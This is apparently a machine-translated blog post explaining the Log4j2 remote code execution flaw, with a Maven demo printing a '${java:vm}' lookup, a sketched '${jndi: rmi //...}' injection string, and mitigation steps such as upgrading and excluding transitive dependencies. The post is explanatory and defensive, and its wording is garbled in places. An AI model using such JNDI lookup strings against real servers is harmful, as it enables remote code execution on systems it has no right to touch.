• J3 – leitian
  • Technology (Log4j # Security)

Have you been surprised by the vulnerability exposed by Log4j?

From the point of view of an industry person (Xiao Bai), I read the relevant news at the first time when I knew about the vulnerability and probably knew the ins and outs of this vulnerability.

Let’s start with the official bug description:

Apache Log4j2 is a Java-based logging tool. The tool rewrites the Log4j framework and introduces a number of rich features. The logging framework is widely used in business system development to record log information.

In most cases, the developer may write the error message caused by user input to the log. An attacker can exploit this vulnerability to construct a special data request package that eventually triggers remote code execution.

The vulnerability hazard level: serious

Impact: 2.0 <= Apache log4j2 <= 2.14.1

Security issues arise when a system uses log4j to print user input to a log in the form ${}

demo

1. Create a basic Maven project

2. Add the following dependencies

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.0</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.14.0</version>
</dependency>
Copy the code

3. Write Java code

public class Log4jErrorTest {

    private static final Logger logger = LogManager.getLogger();

    public static void main(String[] args) {
        // Notice this variable
        String error = "${java:vm}";
        logger.error("============== dangerous print, {}", error); }}Copy the code

4, the results

Of course, this does not seem to be too dangerous, so I think it does not seem to be dangerous for such a system parameter value is the log information is different.

See this is, do we have to ponder extremely frightened

If a hacker changes the value of the error variable to an accessible link, does log4j execute it as a parameter?

The answer is obviously yes.

Now let’s think about it. If we put a string like ${jndi: rmI // dangerous link} into the target program, it will be executed on the affected server.

If so, just inject a database operation to modify the data is not a meteoric rise, the peak of life, of course, I do not recommend doing so.

The principle of

Our focus is on string substitution, which log4j uses as placeholders to replace {} with placeholder variables. This is implemented as a Lookup in Log4j.

The official document address Lookup: logging.apache.org/log4j/2.x/m…

However, I understand that this functionality is based on JNDI, so the vulnerability is to implement a JNDI program that we custom, send it to the target server program, and if they print the string that we typed, they will fall into the trap and execute my custom program on their system.

Mind you, it’s our program that runs on their server, that’s the biggest risk. (Ali defined the danger factor as 10, which seems to be full danger.)

The solution

Method 1: Use no log4j logs

Method 2: Upgrade to 2.15.0

You can use Maven dependency exclusion if your project is associated with Maven dependencies when they are introduced without log4J logs.

See how my project checks for log4j dependencies!

I maintain the project: gitee.com/j3_baiqi/co…

1. The project does have a log4j dependency by searching the project JAR package, but I am very clear that I did not introduce the log4j dependency, so there is only one possibility that it was associated with other dependencies.

The Maven help plugin is used to query jar dependencies

Install the plug-in first

3. Go to the parsing pom.xml file and click the one I marked below to see all dependencies.

4. Next, find the log4j dependencies and see the dependencies as shown in figure 4

5, right-click log4j dependencies, select exclude, and refresh maven to see that there are no log4j dependencies associated with the project.

Well, that's it for today, so follow me and we'll see you next time

Contact information:

QQ: 1491989462, do a good friend, to a point like the hand.


  • Due to the lack of knowledge of the blogger, there will be mistakes, if you find mistakes or bias, please comment to me, I will correct it.

  • If you think the article is good, your retweets, shares, likes and comments are the biggest encouragement to me.

  • Thank you for reading. Welcome and thank you for your attention.

^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^

CSDN:J3 – leitian

The nuggets:J3 – leitian

Zhihu:J3 – leitian

This is a technical average, but keen to share; Inexperienced but thick-skinned; Young and good-looking programmers who insist on talent for a living.

^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^